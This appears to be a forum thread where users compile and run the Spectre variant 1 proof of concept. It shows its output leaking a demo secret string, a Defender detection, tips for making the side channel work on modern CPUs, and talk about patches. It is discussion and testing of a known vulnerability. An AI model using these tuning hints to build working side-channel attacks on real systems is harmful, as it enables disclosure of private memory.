Used the suggested TDM-GCC to compile the sources. First gives: Code: C:\TDM-GCC-32>spectre1 Reading 40 bytes: Reading at malicious_x = 00001004... Success: 0x54='T' score=2 Reading at malicious_x = 00001005... Success: 0x68='h' score=2 Reading at malicious_x = 00001006... Success: 0x65='e' score=2 Reading at malicious_x = 00001007... Success: 0x20=' ' score=2 Reading at malicious_x = 00001008... Success: 0x4D='M' score=2 Reading at malicious_x = 00001009... Success: 0x61='a' score=2 Reading at malicious_x = 0000100A... Success: 0x67='g' score=2 Reading at malicious_x = 0000100B... Success: 0x69='i' score=2 Reading at malicious_x = 0000100C... Success: 0x63='c' score=2 Reading at malicious_x = 0000100D... Success: 0x20=' ' score=2 Reading at malicious_x = 0000100E... Success: 0x57='W' score=2 Reading at malicious_x = 0000100F... Success: 0x6F='o' score=2 Reading at malicious_x = 00001010... Success: 0x72='r' score=2 Reading at malicious_x = 00001011... Success: 0x64='d' score=2 Reading at malicious_x = 00001012... Success: 0x73='s' score=2 Reading at malicious_x = 00001013... Success: 0x20=' ' score=2 Reading at malicious_x = 00001014... Success: 0x61='a' score=2 Reading at malicious_x = 00001015... Success: 0x72='r' score=2 Reading at malicious_x = 00001016... Success: 0x65='e' score=2 Reading at malicious_x = 00001017... Success: 0x20=' ' score=2 Reading at malicious_x = 00001018... Success: 0x53='S' score=2 Reading at malicious_x = 00001019... Success: 0x71='q' score=7 Reading at malicious_x = 0000101A... Success: 0x75='u' score=2 Reading at malicious_x = 0000101B... Success: 0x65='e' score=2 Reading at malicious_x = 0000101C... Success: 0x61='a' score=2 Reading at malicious_x = 0000101D... Success: 0x6D='m' score=2 Reading at malicious_x = 0000101E... Success: 0x69='i' score=7 Reading at malicious_x = 0000101F... Success: 0x73='s' score=7 Reading at malicious_x = 00001020... Success: 0x68='h' score=2 Reading at malicious_x = 00001021... Success: 0x20=' ' score=2 Reading at malicious_x = 00001022... Success: 0x4F='O' score=7 Reading at malicious_x = 00001023... Success: 0x73='s' score=2 Reading at malicious_x = 00001024... Success: 0x73='s' score=2 Reading at malicious_x = 00001025... Success: 0x69='i' score=2 Reading at malicious_x = 00001026... Success: 0x66='f' score=2 Reading at malicious_x = 00001027... Success: 0x72='r' score=2 Reading at malicious_x = 00001028... Success: 0x61='a' score=7 (second best: 0x03 score=1) Reading at malicious_x = 00001029... Success: 0x67='g' score=2 Reading at malicious_x = 0000102A... Success: 0x65='e' score=2 Reading at malicious_x = 0000102B... Success: 0x2E='.' score=2 Original: The Magic Words are Squeamish Ossifrage. Recovered: The Magic Words are Squeamish Ossifrage. Second source gives: Code: C:\TDM-GCC-32>spectre Reading 40 bytes: Reading at malicious_x = 00001004... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999) Reading at malicious_x = 00001005... Unclear: 0xFF='?' score=999 (second best: 0xFB score=999) Reading at malicious_x = 00001006... Unclear: 0xFD='?' score=999 (second best: 0xFB score=999) Reading at malicious_x = 00001007... Unclear: 0xFD='?' score=999 (second best: 0xFC score=999) Reading at malicious_x = 00001008... Unclear: 0xFC='?' score=999 (second best: 0xFA score=999) Reading at malicious_x = 00001009... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999) Reading at malicious_x = 0000100A... Unclear: 0xFF='?' score=999 (second best: 0xFD score=999) Reading at malicious_x = 0000100B... Unclear: 0xFF='?' score=999 (second best: 0xFB score=999) Reading at malicious_x = 0000100C... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999) Reading at malicious_x = 0000100D... Unclear: 0xFE='?' score=999 (second best: 0xFD score=999) Reading at malicious_x = 0000100E... Unclear: 0xFE='?' score=999 (second best: 0xFD score=999) Reading at malicious_x = 0000100F... Unclear: 0xFF='?' score=999 (second best: 0xFD score=999) Reading at malicious_x = 00001010... Unclear: 0xFC='?' score=999 (second best: 0xFB score=999) Reading at malicious_x = 00001011... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999) Reading at malicious_x = 00001012... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999) Reading at malicious_x = 00001013... Unclear: 0xFF='?' score=999 (second best: 0xFC score=999) Reading at malicious_x = 00001014... Unclear: 0xFE='?' score=999 (second best: 0xFD score=999) Reading at malicious_x = 00001015... Unclear: 0xFF='?' score=999 (second best: 0xFC score=999) Reading at malicious_x = 00001016... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999) Reading at malicious_x = 00001017... Unclear: 0xFF='?' score=999 (second best: 0xFD score=999) Reading at malicious_x = 00001018... Unclear: 0xFF='?' score=999 (second best: 0xFD score=999) Reading at malicious_x = 00001019... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999) Reading at malicious_x = 0000101A... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999) Reading at malicious_x = 0000101B... Unclear: 0xFE='?' score=999 (second best: 0xFD score=999) Reading at malicious_x = 0000101C... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999) Reading at malicious_x = 0000101D... Unclear: 0xFE='?' score=999 (second best: 0xFD score=999) Reading at malicious_x = 0000101E... Unclear: 0xFD='?' score=999 (second best: 0xF8 score=999) Reading at malicious_x = 0000101F... Unclear: 0xFD='?' score=999 (second best: 0xFB score=999) Reading at malicious_x = 00001020... Unclear: 0xF9='?' score=999 (second best: 0xF3 score=999) Reading at malicious_x = 00001021... Unclear: 0xFC='?' score=999 (second best: 0xFB score=999) Reading at malicious_x = 00001022... Unclear: 0xFE='?' score=999 (second best: 0xF9 score=999) Reading at malicious_x = 00001023... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999) Reading at malicious_x = 00001024... Unclear: 0xFD='?' score=999 (second best: 0xFC score=999) Reading at malicious_x = 00001025... Unclear: 0xFF='?' score=999 (second best: 0xFD score=999) Reading at malicious_x = 00001026... Unclear: 0xFE='?' score=999 (second best: 0xFD score=999) Reading at malicious_x = 00001027... Unclear: 0xFF='?' score=999 (second best: 0xFE score=999) Reading at malicious_x = 00001028... Unclear: 0xFD='?' score=999 (second best: 0xFB score=999) Reading at malicious_x = 00001029... Unclear: 0xFC='?' score=999 (second best: 0xF7 score=999) Reading at malicious_x = 0000102A... Unclear: 0xFE='?' score=999 (second best: 0xFD score=999) Reading at malicious_x = 0000102B... Unclear: 0xFF='?' score=999 (second best: 0xFC score=999) Original: The Magic Words are Squeamish Ossifrage. Recovered: ???????????????????????????????????????? Additionally Defender just tried to arrest the spectre EXE files . Code: NAME_____:Exploit:Win32/Spectre.A RESOURCE_:file:_C:\TDM-GCC-32\spectre.exe EXECUTED_:False ISACTIVE_:False
You can start spectre EXE from Wine Emulator Ony any system. I run it from my android phone. What do you think is the magic word on the phone?
wow I forgot to see this dude but now I see this is awesome very thanks for share here still I'm thinking in make one too who know someday no very expensive
NO bro of course that no sometimes is better smile than cry when we see this huge and bad behavior started with Intel
@s1ave77 That's the expected result. The "faster" version is for older hardware e.g. using LGA 775/771 socket. You can change it to work on modern hardware by changing __rdtsc() into __rdtscp(& junk). I've made another change to the code since I was able to compile it and get a good result on Windows with TDM-GCC, but Linux was giving me a bad result. Now both are giving me a good result. The issue is with the readMemoryByte function. Notice that it contains a line saying "use junk so code above won’t get optimized out". Basically if you modify any code in that function then it could be the difference between Spectre working or not working. I could literally write the code 3-4 different ways and only 1 would function well. @Mikorist Try the newer version containing assembly. It'll probably be better.
Yes. Our comments aren't so much different though. The second level of Spectre is not having a software fix - if I could recall properly. Despite all the published patches there is still one thing remaining that these problems had been existing for over a decade without reporting them.
Other than compiler weirdness that's why I didn't get around to posting executables. We'd get the inevitable "is it safe?" questions. @Mikorist I guess you'd like my version to do the same? I'll take a look, but if the compiler starts misbehaving then I won't post anything.
@Mikorist Unfortunately it causes compiler weirdness as it changes the readMemoryByte function. The hit threshold isn't that important anyway and we can already change the address and length. Speaking of which, I've made a minor edit so that the secret isn't printed when an address and length are given.
On Linux it doesn't seem to matter, but on other platforms it can generate a warning. The original code will crash on old hardware. My version doesn't and it'll compile on Windows, Linux & Mac OS.
I've deleted some posts from this thread as I think a few people are getting confused. Windows, Mac OS and Linux (e.g. openSUSE) are fully patched You require a microcode update to protect yourself from Spectre variant 2 Getting a result from the Specre PoC shouldn't worry you. Focus on what the PowerShell script says! Updating applications that may contain sensitive information helps e.g. Firefox, Chrome & Nvidia So if you're fully patched you can relax. You'll only be impacted if you don't apply application updates and launch an infected executable.
Of course. In the above-mentioned pdf, scientists showed PoC for testing purpose that reading the result from it's own address space. They did not publish PUBLIC the one that attacks apps and is not harmless. And I hope they never will.